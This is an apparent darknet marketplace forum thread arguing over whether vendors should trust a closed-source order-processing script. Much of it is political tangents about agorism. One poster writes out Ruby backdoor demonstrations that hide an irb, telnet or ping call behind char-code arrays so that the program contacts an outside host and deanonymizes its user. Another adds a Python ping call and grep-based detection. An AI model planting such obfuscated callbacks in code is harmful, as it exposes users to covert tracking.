Not putting them in prison. Keeping them out of prison.
These are the regulation mechanisms, which you and other commoners substitute with agorism.
Go on! Go on! I'm already applauding here!
I presume you're applauding because you think I'm going to write out a long description of what agorism is, only to be met with a 3 sentence reply from you that makes absolutely no sense and isn't backed up by any logic whatsoever.
You misunderstood me. :D
Another 0.2 BTC reward for anyone that can figure out the meaning behind that. I'm going to hazard a guess and say that English isn't your first language?
go talk to yourself. I have zero tolerance to imbeciles.
You can't answer the simple question that spurred this entire debate, you show a clear lack of understanding of any of the concepts we've been trying to discuss, and you throw an insult at me simply because you don't wish to debate the issue any further. Nice.
For the record, when I asked if English was your first language it was a genuine question. Your grammar and your inability to grasp concepts that I have explained at length would suggest you're not 'getting' everything due to not understanding every word I used, so I assumed English isn't your native language; hence my offer to strip my posts down a little if that were the case. I was just trying to be helpful, but apparently that makes me an imbecile.
You, sir or madame, are an absolute gem. ::)
If you'd like to discuss the issues further, please feel free to PM me. I'm genuinely interested in the bizarre logic that you're employing to arrive at your conclusions over the last few posts and would like the chance to break things down, if possible.
- grahamgreene
-
I can also completely understand pine's insistence that the code be released and checked before it is implemented by anyone; this is good security practice, but the fact that this is a product that is for sale by a registered vendor on an agorist marketplace makes this request more than a little unreasonable.
I strongly identify with Agorism, but one common theme I notice in many people who identify as such is that they let their ideological insistence on free markets and profit cloud their thinking. I actually notice this strongly when it comes to security software in particular. In many cases the best security and anonymity solutions are inherently free. Look at Tor and then look at any VPN. Tor works because volunteers donate their resources to a collective of people who are free to use them without any pay. Although it is not strictly speaking communistic due to the fact that nobody is forced to donate resources, it strikes me as having a more communist based ideology behind it than a paid VPN does. The fact that thousands of people volunteer their resources at little to no benefit for themselves allows Tor to be extremely good at providing low latency anonymity. I see a lot of Agorists who are actually not very fond of Tor and highly favor VPNs (probably in part due to the fact that they sell access to VPN's and are pissed off that Tor offers better anonymity than they can in addition to being free). They are also highly focused on creating pay anonymity networks where every byte you transmit comes at a cost that is paid to the node operators who relay for you. Now I have nothing against people being paid for their resources, but from a security point of view I cringe at the idea of adding an entire unnecessary financial payment topology to an anonymity network. Now you need to anonymize the network traffic and the payment for the network traffic.
So Agorism is awesome and profiting from your work is awesome, but some things just do not mix well with profit unless you are extremely careful with how you go about it. You can donate cash to the Tor project and even to individual node operators in many cases. They do not make you pay to use their resources though. Truecrypt does not make you pay to use it, the source code is open and it is freely available for anyone to download and audit. At the same time they accept donations and make thousands of dollars. Not as much as the people making closed source proprietary encryption software make, but then again we can be more confident when we use their solution than we can be when we use the solutions from their strictly for profit competitors. Look at FileVault and VileFault for example.
Yes, warn vendors to go through the code with a fine-tooth comb should they purchase this item, but that's something that they should be doing anyway with anything that could potentially compromise them. It would do no harm to anyone to post this recommendation, but your statement will likely harm LouisCyphre's business prospects and damage his good reputation in the community. This is essentially slander.
We should not put the financial interests of vendors here above the security of everyone else. Vendors who purchase this code are not going to go through it with a fine tooth comb because if they knew enough to do that then they would simply make the program themselves. We need to be practical when we think of situations like these, sure it is possible to run this code completely isolated and be one hundred percent safe. Are people going to actually do this? Probably not. It is almost a strawman to give arguments like this, because in reality the people who would purchase this are not going to isolate it they are not going to audit it etc. Even if the code is one hundred percent non-malicious it doesn't matter because if we don't point out that people should not buy restricted access software from Louis then we have no right to point out that people should not use restricted access software that is offered through SR (or anywhere else) at all. It has nothing to do with Louis as an individual or a vendor, it has to do with best security practices, and the best practice for security would be to not run scripts that 99% of people on the forum are never going to look at, especially when the 1% of people who will pay for them are certainly going to be the people who do not have the skills to audit them.
Declaring LouisCyphre as "our resident LE Agent" is incredibly rash of you pine, and defamatory in the extreme; in the interest of fairness I would ask that the thread title be amended to reflect the fact that there is absolutely no evidence to back up this accusation.
A fair enough point.
You may assert that because he won't release the source code that he must be LE, or malicious in the extreme, but there is absolutely no logic in that at all. He's a creator of a digital item that he wishes to sell on an agorist marketplace, to anybody who wishes to buy it. He is allowed to do that, and has a right to do it without prejudice.
Asserting that he has malicious intent before you've seen the code is outrageous. Whilst I can see where you're coming from and how you arrived at the conclusion that you did, if you feel there is something malicious in what LouisCyphre is offering you are free to purchase it and review the code yourself for peace of mind - just like anybody else.
It is not particularly outrageous. If someone here suggests that we all stop using Tor and start using their for profit VPN, I will be the first to claim that the person is likely a law enforcement agent, Agorism and individual profit be damned.
-
And no. So long as the scripts themselves are not ridiculous mountains of tortured spaghetti code (in which case no-one should run it on general principle), there will be no room full of NSA spooks required to vet the code thoroughly. It will be relatively brief. Either it makes network connections, or it doesn't. Either it does unexpected IO, or it doesn't.
You might be able to have it so that you encrypt code that does networking with GPG and have a special header for it, and in the code that is distributed have it (obfuscated of course, which would probably be caught in an audit) take the message that is decrypted from the ciphertext and run it as a script if the header is detected. Then you could completely hide any networking calls and have the code distributed look a lot more legit, although there would still be a switch that is looking for a special signal and of course the code that then runs whatever is decrypted as a script. Not a foolproof plan by any means, but it would possibly be easier to hide this than my original post of a ruby method that does networking while obfuscating IP address and port and obfuscated require of sockets, (although not the fact that TCP is being used). Still nothing that wouldn't be noticed, but to notice such a thing you would really need to know the language and again if you know the language why are you using a simple script someone else made.
-
No, that's just your opinion. You want me to adhere to your definition of what Silk Road should be rather than what it actually is.
No actually I don't give a shit what you do, but I will let people know that unless you adhere to my idea of what is secure that they should not use or pay for your software.
I've said my product is a particular thing, which runs in a certain way and is not a threat. You (and Pine) say otherwise. If people agree with you or are just not interested in the product then they won't buy it. If people don't agree with you and are interested in the product then they might buy it.
I never said otherwise. I merely said the potential exists, and then explained how this potential can be greatly reduced. I am merely warning the people who may buy your product, that I would not consider it to be in their best interests to do so, as things currently stand.
If people buy it and I am telling the truth then that will be reported to the forum and, hopefully, I will have more sales. If people buy it and it turns out I've lied or the product is a threat (or just includes a bad bug that makes it a threat), then that will be revealed. At that point I will lose all credibility, have no sales and possibly have my account terminated and be driven from the site.
Except nobody who buys a simple python script like this is going to have the slightest clue if you are telling the truth or not.
If you really want to prove me wrong then buy SROPPy and post the code. I'm willing to bet you don't do that.
Why would I buy something that I could make myself in about ten minutes with Ruby?
PS here is a neat link that talks about interpreted/compiled and handily discusses ruby and python. http://programmers.stackexchange.com/questions/24558/is-python-interpreted-or-compiled
-
lim lim limmy...
it's actually what hinders it.
though it certainly has it's awesome points. just simply not the best a human existence can do. for capitalism to thrive, problems have to exist and continue to exist. ever seen the storyofstuff.com? or storyofbottledwater? this is a system for conventionals... cyclical consumption and planned obsolescence is what drives the magic capitalistic circle of consumption and infinite growth and profit. except the resources that make it all happen are not infinite. sorry for the derail. back on track back on track... wasn't cypher from the matrix uhh.....?
i think the system is great. as a transitioning one.
We shall have to agree to disagree my friend. :)
Anyway to the original point, can anyone confirm that the person is 110% Bent or not because I've had messages from both sides asking me to step in now so conclusions would be nice.
-
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by it's very regulatory nature is what powers the governments of today, and with them, their restrictive laws. Don't get me wrong, I like making money hand over fist as much as the next guy but that is only because we currently live within the confines of a capitalist society.
What a crock of shit. Agorism is extremely anti government. Agorists do not recognize the legitimacy of any government, or even of nations separated by borders. They are extremely against regulation. Even people who are anti-capitalist generally accuse capitalists of being anti-regulation, claiming that government regulations protect the people from the evil capitalists who only care about money and not the well being of the people, so I don't see where you get capitalism is pro regulation from. The USA is not a capitalist country, if that is where you happen to live. The USA merely claims to be a capitalist country. It is really quite a fascist country, although currently the democract politicians masquerade as socialist to get support from the public which is largely in favor of socialism. Agorism is about as anti-regulation anti-government anti-fascist as you can get, although it is perfectly fine with market manipulation and monopolies and such.
Capitalism is the reason that marijuana and most other drugs aren't restricted. Marijuana's prohibition in particular was the result of corrupt capitalism and the power that pharmaceutical companies who lobby politicians to keep legalisation off the agenda also exists as a symptom of the capitalist condition.
No most of those drugs are restricted, maybe that is what you meant to say? And it is because of fascism not capitalism. Silk road is a great example of Agorism. The primary theory of Agorism is that private security agencies will rise up, funded by black market activity (such as drug trafficking), and will eventually become powerful enough to totally protect their customers from the state, eventually leading to the death of the state and government. That is Agorism in a nutshell, not banning drugs and regulating things lol.
Money, money, everywhere but none of it with any value. I think that it essentially comes down to the one's view of the difference between 'amount' and 'value'. Personally I would much rather have complete and sovereign freedom, to exist completely free as is my natural right, to any amount of anything. I value my freedom more than I value money, for what is money but a chain with which we are enslaved.
Most Agorists are very pro-gold and against fiat currency, although bitcoin is of course insanely popular with them as well.
-
So no answer to my question then?
-
try this on for size.....
the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...
#opens the file with your GPG message in it
file = File.open("test", "r")
message = ""
#reads the file line by line and adds each line to the string variable message
while line = file.gets
message << line
end
#decrypts your message and stores the plaintext as decrypted_message
decrypted_message = `echo "#{message}" | gpg -d`
#if the message is encrypted with the gpg-privacy toolkit we need to
#issue a special command or else it will fail because of the way
#that program encodes the messages. If a normal GPG client
#was used to encrypt the message, we don't need to do any
#special formating though.
if decrypted_message.include?("gpg-privacy-toolkit")
puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
else
puts `echo "#{decrypted_message"}`
end
let's see now...how about this as a message to encrypt to the unsuspecting vendor
#gpg-privacy-toolkit
require 'socket' ; sucks_to_be_you = TCPServer.open('11.11.11.11', '80') ; sucks_to_be_you.send('deanonymized', 0)
the ciphertext looks like this
-----BEGIN PGP MESSAGE-----
Version: GnuPG v1.4.11 (GNU/Linux)
hQIMA7GSQgzgdfsTAQ//SP27JA3aDgZh/atdSWeVAWekkUjQPuCuhwnZjxi5vFvG
E0N1SkQ/uAwgcGVEX4QWluYDudbI2SP88INsC1rL9E+jSASwjxr1dnSZBbXElj6d
y/SBf1an0fBYw1thd4EecO4iqqjgVm+YFND2qxoFvtFd5TAH/tC3qBNgp0Q3meDC
iXuvlZVOdmRDT5t4BM+Ukur4pdLzzzOMdeovp7augZAoj3VT9vlWH05PknPW0DWq
4efDGUeVlkxY//Es3R5LmkZ6XoSFOvPzTEaW5a9OC5ZyELL1+OrL61xKQR0l+o7s
4VkGPrhBAwec41+tuMZ9cz6NhGlyQc8950Pv99J6dXMgxP4iEe2h2CFTzk4+uPHc
QDeYQqcXI0elzzE+kF9ptuzcaF0sAP9Tx0yOmSggwGoFbj6sSQQPcARBoOg4TYvk
yVfchlIufeAfVZJsZUGKm+0fK2oI2Xvoy3HCWPUgc347esyxQrS5Mzrt9XVqm3gc
SO5dJ/ltgr3HNyrQPdQxmzOHEznaq8R+X5ImI7YdnEiVVLNYM2Br/v6tD3xXTEDY
7js+YHDSrdv1/WCtUjiiIJjKzS6y4YlAXF9E44C2XbSttj8XqwCHR59MH3x5YDrv
wy/02J6QJW4Gw39gqyO3FUkU0WaqpWGsmxE7mudvI+cH0rypxonM1nfBXar4tdbS
qgGT3ebTFWGr4oH+8nO9dv/KF95yw68MykNzeRJTI1idJjY2zgw3xQ8REU6aCM3v
LjdZq/BT2LvqSjVCLVuLHy6PbyxbKAhPSMg5W2LkK/eyE9/zVKVAmsWb7osK5XyW
HVuOHyKG4okWFvw7NgqMozzpYEAavvvhzPheQxyWfvC3NOCk+S88Shm37RfPpWNd
xAtlf2Z+4INETIptQdXBsaPAJQyFifn7lIl1
=6RTM
-----END PGP MESSAGE-----
hopefully nobody decrypts my message!!!
-
And this means....
-
OK, I deleted my other accounts password because I realized that I don't want to spend my time posting on an internet forum but I just wanted to say that I pretty much completely agree with everything that kmf posted on this and the last page. When I tried to tell louis not to pointlessly bring up political philosophy I was worried about exactly what has happened on the last few pages: completely pointless tangents based around agorism etc that have absolutely nothing to do with the software or anything else. Luckily, unlike everyone else, kmf cut right to the point pretty much. In the end you just can't trust completely unaudited etc software from an anonymous person on the internet. All of his posts about how it's against agorism not to let him sell and that he could supposedly easily do things more easily with jpgs really don't answer that point at all imo.
I really wish guru would voice his opinion though as his posts always make sense to me.
I actually feel like indulging in these off topic posts a bit though ironically. I have a couple of questions about agorism/free market anarchism/whatever that I'd like answered although all of this is off topic.
On the topic of market run police how could a market regulate prison sentencing? Say a murderer is caught, what would be done with him and who would decide that?
On the topic of anarchist free market capitalism. I've thought a lot about the end goal of any form of government that governs the human race and I think that one of the end goals is that no human being should have absolute power over the basic rights of another human being at any time. However, if the government was abolished then I don't think that that would actually do that job. I think that, as our USA government is pretty much corporation run now, that if anarchism was brought about these corporations would lose none of their power and we'd pretty much be left in the same situation we're in now only without politicians and a government as middlemen.
So wouldn't there be just as much potential for tyranny from the extremely rich and powerful as there would from the government in the first place? It seems to me that in an anarcho-capitalist society there would still be just as many extremely powerful people who have power over the rights of other people, and that they just wouldn't be in "official" positions. There would still be a vast difference in rights between the rich and everyone else. To me that's not true human equality.
-
it means that it doesn't matter if there is no networking code in the distributed program, if there is code in the distributed program that launches whatever it decrypts as a script, provided it has a magic keyword in it ;). The entire code distributed has no hint of networking being done because it gets that from the plaintext after it decrypts the message.
if decrypted_message.include?("gpg-privacy-toolkit")
`echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
end
checks the plaintext for the string "gpg-privacy-toolkit" and if it finds it then the entire plaintext is launched as a ruby script.
edit: here I improved it a little bit, now it actually outputs the decrypted message but if it has the 'magic' string in it then it sends packets to 11.11.11.11:80 (around Tor of course, unless you have taken configuration measures around this, like transparent proxy, firewall rules to drop traffic, isolated it somehow, etc etc).
if decrypted_message.include?("gpg-privacy-toolkit")
puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
else
puts `echo "#{decrypted_message"}`
end
The only difference between a legitimate program for decrypting messages and showing the plaintext and a malicious program that could deanonymize you boils down to
| #{[105, 114, 98].pack("c*")}
-
And how does this relate to the person being accused.....
-
And how does this relate to the person being accused.....
it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize | #{[105, 114, 98].pack("c*")} is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.
-
And thus LouisCypher is.....?
-
And thus LouisCypher is.....?
Engaged in a business model that should not be sustainable on a forum that has members who value security?
-
It seems to me that in an anarcho-capitalist society there would still be just as many extremely powerful people who have power over the rights of other people, and that they just wouldn't be in "official" positions. There would still be a vast difference in rights between the rich and everyone else. To me that's not true human equality.
Agorism is not magic and there will always be people who try to unfairly control others. As an extreme analogy: No matter how many men desire to, or how righteous their desire is, they can never stop an omnipotent being from doing as it pleases with them. No political ideology or popular support could change such a scenario. Agorism itself is largely tied to the non-aggression principle, people should be free to do what they please so long as they do not infringe on the freedom of others. Anyone who infringes on the freedom of others is seen as a threat and attempts will be made to stop them, generally via private defense agencies. The rich and powerful could have their own agencies that try to allow them to do whatever they please, that is simply a fact of reality and nothing can change it. However nobody says that they will win. Look at the powerful agencies such as FBI and DEA, it appears as if they have been stripped of their power to oppress by a single man using open source software. Good and evil will always fight but thankfully there is nothing to stop good from winning many battles in what is likely to be a never ending war.
-
Hmm, Interesting discussion. Kmfkewm if that's your idea of a fight involving good and evil and you think of that as a valid argument then you're clearly not looking at the obvious fact. You say that open source software has given us the ability to get the better of the dea or the fbi but that's simply not true. In this reality "evil" is winning by a landslide and there is no end in sight. If the government magically disappeared it would be the same. You think poor and middle class people would have the resources to counter "private defense agencies" of the rich? They couldn't. Sure maybe we have avoided losing our internet rights with open source software and can even order drugs with little risk now, but that has little to do with real life where the dea and the fbi imprison people every day and the people with money have the power to infringe on your rights. right now it's the government with armies and police forces and in anarchy it would be corporations with "private defense agencies." What's the difference?
-
I just realized I was being far too complicated with my backdoor. How about this.
#opens the file with your GPG message in it
file = File.open("test", "r")
message = ""
#reads the file line by line and adds each line to the string variable message
while line = file.gets
message << line
end
#decrypts your message and stores the plaintext as decrypted_message
decrypted_message = `echo "#{message}" | gpg -d`
#prints the decrypted message to the screen
puts `echo "#{decrypted_message"}`
`#{[116, 101, 108, 110, 101, 116, 32, 49, 50, 55, 46, 48, 46, 48, 46, 49, 32, 56, 49, 49, 56].pack("c*")}`
On the negative side it now has an even bigger string of inexplicable numbers, on the positive side no matter what message the user gets it telnets to whatever server I would like it to go to and the message doesn't need to include ruby code at all. Hmm I bet I can think of an even more sneaky way to get IP addresses.....this is kind of fun.
hm ping has less numbers `#{[112, 105, 110, 103, 32, 108, 46, 116, 118].pack("c*")}`
-
Hmm, Interesting discussion. Kmfkewm if that's your idea of a fight involving good and evil and you think of that as a valid argument then you're clearly not looking at the obvious fact. You say that open source software has given us the ability to get the better of the dea or the fbi but that's simply not true. In this reality "evil" is winning by a landslide and there is no end in sight. If the government magically disappeared it would be the same. You think poor and middle class people would have the resources to counter "private defense agencies" of the rich? They couldn't. Sure maybe we have avoided losing our internet rights with open source software and can even order drugs with little risk now, but that has little to do with real life where the dea and the fbi imprison people every day and the people with money have the power to infringe on your rights. right now it's the government with armies and police forces and in anarchy it would be corporations with "private defense agencies." What's the difference?
Is it not true that bullet proof vests protect us from bullets even if people who shoot themselves in the head continue to die?
-
Ah Guru you are such a breath of fresh air man. You I like a Smint at the north pole whilst standing the north with wearing slightly damp pants.
-
As such, Louis has the right to market his wares under any conditions that he deems fit.
Nobody really argued that he should be banned from selling it, we are just warning people that it is dumb if they buy it unless the source code is publicly available for all to audit. The type of people who will buy something like this are inherently people who do not know how to properly audit it.
Frankly, what I see here is that Louis appears to be being held to a higher standard than other vendors here on Silk Road.
If a vendor is selling MDMA tablets that are of a press known to frequently contain PMA then is it wrong for us to bring this up? No. He is being held to the same standard as any other vendor, reviews are being left on his product. If someone sells PMA we don't need to try it to leave a review saying that it is dangerous, do we?
As almost everyone who knows me on here is aware, I'm not a drug user. Let's put that aside for a moment, and assume that this is not the case -- let's assume for a moment, for the purpose of argument, that I have decided to purchase a quantity of heroin. Now, how do I know that the heroin I purchase from a vendor on here has not been cut with Drano or rat poison? I don't.
It is wrong to say that his product IS backdoored. It is wrong to say a vendors product has been cut with Drano if you have not purchased some and tested it. it is not wrong to say that PMA is dangerous if a vendor is selling PMA.
I don't see DPR mandating that all drug vendors must have their wares laboratory-tested prior to sale, to prove their purity, and to prove that they were not contaminated/adulterated with harmful chemicals.
It wouldn't be a bad idea but the implementation details are a bit difficult. There are labs in NL that legally test drugs and return such data, maybe we could work something out with them. The hardest part is making it so vendors do not know who the people doing tests are. And having a single person who does tests illegally in countries where it is not allowed will clearly not work. It would at least be nice if we had certifications a vendor can obtain through some private service here that randomly buys drugs from vendors to be shipped to new addresses for quality control. Mandated? Of course not. An extra service for harm reduction....yes.
I also haven't seen Pine (or anyone else) pillory the vendors of the various USB-stick-based anonymity solutions that are being hawked on Silk Road.
Really? I have called several of them 'potential feds'. I wouldn't be caught dead ordering a USB stick based anonymity solution from a vendor here. These techniques are literally straight out of fed 101.
So, again, why is Louis being held to a higher standard than everyone else? Why is he being asked to prove the safety of his product, when every other vendor on Silk Road is not?
Because his product could lead to vendors being busted and then customers being busted? But he has no obligation to be responsible with his programs, just as we have no responsibility to say we think his behaviors are anything other than sketchy.
I don't trust Louis' software -- I wouldn't rouch it with a barge-pole. I also wouldn't trust software written by Pine, kmfkewm, Shannon or even DPR themselves for that matter, unless I had thoroughly vetted it first.
You should learn C because I am going to release some nice stuff soon :). Also have it in Ruby nearly done but that is just for prototyping.
Louis is absolutely right -- he has the right to sell his software, and people have the right to buy it -- or not -- as they see fit.
Sure enough and we have the right to leave reviews saying that we find it sketchy and warning the poor souls who might otherwise think it is safe to privately obtain scripts from people on SR to help aide them in their drug trafficking careers.
-
Well, on a theoretical level I think that everything you said makes sense guru, but on the other hand I feel that your comparison between asking a drug seller to prove their wares and asking a programmer to prove that their software is safe.
The difference is as follows:
1. It's impossible for a drug seller to really prove that they'll always be shipping something safe. It's a lot easier for a programmer to prove that their program is safe by releasing it open source etc.
2. If a drug dealer ships something unsafe then 1 person has a bad reaction. If louis widely gives out malware specifically targetting vendors and information regarding their vending then thats a major blow to silk road itself.
3. It's usually possible for a user of drugs to get a reagent test and test their drugs. It's not possible for a prospective user of software to suddenly learn programming and test a program.
Of course like kmf just posted I'm not disagreeing with any of your main points I just think it's an inaccurate comparison. I also still think that agorism has nothing to do with whether it's a security risk or not which is the only point that anyone has brought up, but it doesn't really matter.
So sure, don't force louis to do anything, but at the same time I'm glad that people have spoken out against this because this WOULD be a great way to get at vendors(although I don't think that it is that).
Anyway, to prospective buyers of this software I would ask, is taking the security risk of using unaudited or widely viewed software from an anon on the internet and paying over $100 worth slightly streamlining 1 small part of your job? I certainly wouldn't think so.
I don't think that's an unreasonable thing to say either.
Anyway, kmf pretty much said the same thing I think so you can just respond to him if you want.
-
Also do you have any idea how the police thing I asked about should be handled kmf? That's something that has been puzzling me about anarchy for awhile. I guess free market based police couldn't do much worse than the current police though.
-
You might be able to have it so that you encrypt code that does networking with GPG and have a special header for it,
That would still be easy to spot, just look for encrypted data in the original files.
Still nothing that wouldn't be noticed, but to notice such a thing you would really need to know the language and again if you know the language why are you using a simple script someone else made.
As you say, it is something that would be noticed and also easy to find. Even if you change the "BEGIN PGP MESSAGE" and "END PGP MESSAGE" lines to obfuscate the encrypted block, you'd still have to change them back before decryption. Whatever method you conceive of to conceal them or to rewrite them would be easily found.
Also, searching the code for any GPG command which did not invoke the user's own key and passphrase would be easy to spot. GPG is invoked *once* in this code. By default it is "gpg --decrypt-files *.asc" and that's it (either in a bash script or in an os.system() call). That might be modified to force use of a particular key in order to deal with files encrypted with --hidden-recipient, --hidden-encrypt-to or --throw-keyid. Anything else without a damn good reason and the jig is up.
-
No, that's just your opinion. You want me to adhere to your definition of what Silk Road should be rather than what it actually is.
No actually I don't give a shit what you do, but I will let people know that unless you adhere to my idea of what is secure that they should not use or pay for your software.
Okay.
I've said my product is a particular thing, which runs in a certain way and is not a threat. You (and Pine) say otherwise. If people agree with you or are just not interested in the product then they won't buy it. If people don't agree with you and are interested in the product then they might buy it.
I never said otherwise. I merely said the potential exists, and then explained how this potential can be greatly reduced. I am merely warning the people who may buy your product, that I would not consider it to be in their best interests to do so, as things currently stand.
Except elsewhere you have asserted that it is more than mere potential when you said that 100% of people using my software would be fucked/exploited (see my reply to that statement).
If people buy it and I am telling the truth then that will be reported to the forum and, hopefully, I will have more sales. If people buy it and it turns out I've lied or the product is a threat (or just includes a bad bug that makes it a threat), then that will be revealed. At that point I will lose all credibility, have no sales and possibly have my account terminated and be driven from the site.
Except nobody who buys a simple python script like this is going to have the slightest clue if you are telling the truth or not.
It uses *very* simple functions, I can explain what things like file.write() and file.readlines() do and then point them at the documentation (which includes examples) to show that I am not lying.
If you really want to prove me wrong then buy SROPPy and post the code. I'm willing to bet you don't do that.
Why would I buy something that I could make myself in about ten minutes with Ruby?
Then why don't you? Either put your money where your mouth is, buy the code and release it or put your Ruby where your mouth is and code a free alternative.
PS here is a neat link that talks about interpreted/compiled and handily discusses ruby and python. http://programmers.stackexchange.com/questions/24558/is-python-interpreted-or-compiled
Yeah, Python tends to be both.
Running an executable .py file uses the Python interpreter to run the code. Imported modules are compiled at the time of import by the Python interpreter and run (which generates the .pyc files). Python itself is built in C (which is obviously compiled) with some modules written in C and some in Python.
If the Python interpreter were exploited, that could be a vector of attack. If I'd said "use this code with my custom version of Python" then sure, nail my arse to the wall. I didn't because as long as it's an official release with support for the modules used (currently csv, but likely csv and os when the shell scripts are replaced at some nebulous point in the future) I don't really care. There are enough code savvy eyes looking at the Python code base to make sure someone doesn't sneak something in there.
-
Anyway to the original point, can anyone confirm that the person is 110% Bent or not because I've had messages from both sides asking me to step in now so conclusions would be nice.
Well, I say I'm not. ;) While Pine says I am. As for what everyone else thinks, you'll need to read through the thread.
Personally I think I'm addressing enough of the issues to not need the thread locked down. I would like the thread title changed and Pine has thus far ignored all calls for that to be done.
I think there will always be differences of opinion about whether I should give my work away for free or not, but I figure the market can decide what actually happens there.
-
try this on for size.....
the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...
Which would be easy to spot by either the presence of the encrypted message or a decryption command other than the one included in the existing code. In order to get it to run with the existing sroppy config it would need to be a .asc file that is distributed initially which is encrypted to the vendor's key (which may be different from the key they are communicating with me with and may not reveal the vendor's username).
So let's be clear: there is NO encrypted data distributed with my code. The only encrypted data used is taken from the vendor's own order page and it is all handled the same way (decrypted, converted to a printable format and then printed).
-
it means that it doesn't matter if there is no networking code in the distributed program, if there is code in the distributed program that launches whatever it decrypts as a script, provided it has a magic keyword in it ;). The entire code distributed has no hint of networking being done because it gets that from the plaintext after it decrypts the message.
...
The only difference between a legitimate program for decrypting messages and showing the plaintext and a malicious program that could deanonymize you boils down to
| #{[105, 114, 98].pack("c*")}
Then the issue boils down to where is the encrypted data coming from? If there is encrypted data in my code (there isn't) then what you describe is possible. If the only encrypted data is coming from vendor's order page then it's really not.
Not to mention the previous mention of using an air gap, which we've covered (if anyone else cares, go re-read from the start of the thread).
To do that I would need to insert code which checked each decrypted address for a specific string and then generate the code.
All it does is decrypt the files created from the CSV, decrypt them (as previously described), read the data and then rewrite that in another format to a new file. The reading and writing of files in Python is explained here:
http://docs.python.org/tutorial/inputoutput.html
-
And how does this relate to the person being accused.....
it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize | #{[105, 114, 98].pack("c*")} is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.
Well, for a start you'd need to translate your Ruby exploit to Python, but ignore that for now.
Your exploit depends on either:
a) shipping the code with encrypted data that is decrypted and run when the code is executed AND the code is being executed on a system with network access;
or b) inserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.
Now, my rebuttal:
* No encrypted data is shipped with my code.
* There is a copy of my GPG key currently. I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).
* There is no such exploit in my code.
* Such an exploit would be able to be spotted.
* My code does not require or use a network connection in any way (vendors an make their own decisions on whether or not to utilise an air gap).
* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it). This would pretty effectively stop an exploit checking address data from being used in a live system.
So, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement. It's one thing to to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine. Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile. It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.
-
I just realized I was being far too complicated with my backdoor. How about this.
It still depends on decrypting data and I've addressed that above.
On the negative side it now has an even bigger string of inexplicable numbers, on the positive side no matter what message the user gets it telnets to whatever server I would like it to go to and the message doesn't need to include ruby code at all. Hmm I bet I can think of an even more sneaky way to get IP addresses.....this is kind of fun.
hm ping has less numbers `#{[112, 105, 110, 103, 32, 108, 46, 116, 118].pack("c*")}`
Oh, for God's sake, if that's all you want, then in Python it's this (replace localhost with the IP you want and maybe insert some hex code with the -p flag):
os.system("ping -c 4 127.0.0.1")
You'd want to play around with it to prevent the output printing to the screen and to make sure it worked on each OS, but otherwise that's it. Of course spotting that is easy:
tar -xzvf sroppy.tar.gz
cd sroppy
grep ping*
Or even grep os.system * to see what all the system calls are doing. In the current version there aren't any, but there will be a very small number in a future version. There is not a ping command (or any other network connection) in my code.
More detail on the os module is here:
http://docs.python.org/library/os.html
-
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by it's very regulatory nature is what powers the governments of today, and with them, their restrictive laws. Don't get me wrong, I like making money hand over fist as much as the next guy but that is only because we currently live within the confines of a capitalist society.
What a crock of shit. Agorism is extremely anti government. Agorists do not recognize the legitimacy of any government, or even of nations separated by borders. They are extremely against regulation. Even people who are anti-capitalist generally accuse capitalists of being anti-regulation, claiming that government regulations protect the people from the evil capitalists who only care about money and not the well being of the people, so I don't see where you get capitalism is pro regulation from. The USA is not a capitalist country, if that is where you happen to live. The USA merely claims to be a capitalist country. It is really quite a fascist country, although currently the democract politicians masquerade as socialist to get support from the public which is largely in favor of socialism. Agorism is about as anti-regulation anti-government anti-fascist as you can get, although it is perfectly fine with market manipulation and monopolies and such.
Note that I stated I WAS a staunch capitalist for many years, not that I remain one. I think perhaps you may have misread what I wrote above? ??? I stated that with capitalism comes regulation and government intrusion, and that capitalism by way of it's regulatory nature is what powers the governments of today and their restrictive laws.
As far as the US is concerned, no I don't live there but I would agree that it is becoming terribly fascist. I think it would best be described as having a dirigiste economy.
Capitalism is the reason that marijuana and most other drugs aren't restricted. Marijuana's prohibition in particular was the result of corrupt capitalism and the power that pharmaceutical companies who lobby politicians to keep legalisation off the agenda also exists as a symptom of the capitalist condition.
No most of those drugs are restricted, maybe that is what you meant to say? And it is because of fascism not capitalism. Silk road is a great example of Agorism. The primary theory of Agorism is that private security agencies will rise up, funded by black market activity (such as drug trafficking), and will eventually become powerful enough to totally protect their customers from the state, eventually leading to the death of the state and government. That is Agorism in a nutshell, not banning drugs and regulating things lol.
Yup, that was a typo. I mean to say "Capitalism is the reason that marijuana and most other drugs ARE restricted." I don't understand your tirade against pretty much everything I said; we agree on virtually all the points above. I did not mention once that agorism was about banning drugs and regulating things - in fact I stated the opposite, apart from the sentence containing that one typo. ???
Money, money, everywhere but none of it with any value. I think that it essentially comes down to the one's view of the difference between 'amount' and 'value'. Personally I would much rather have complete and sovereign freedom, to exist completely free as is my natural right, to any amount of anything. I value my freedom more than I value money, for what is money but a chain with which we are enslaved.
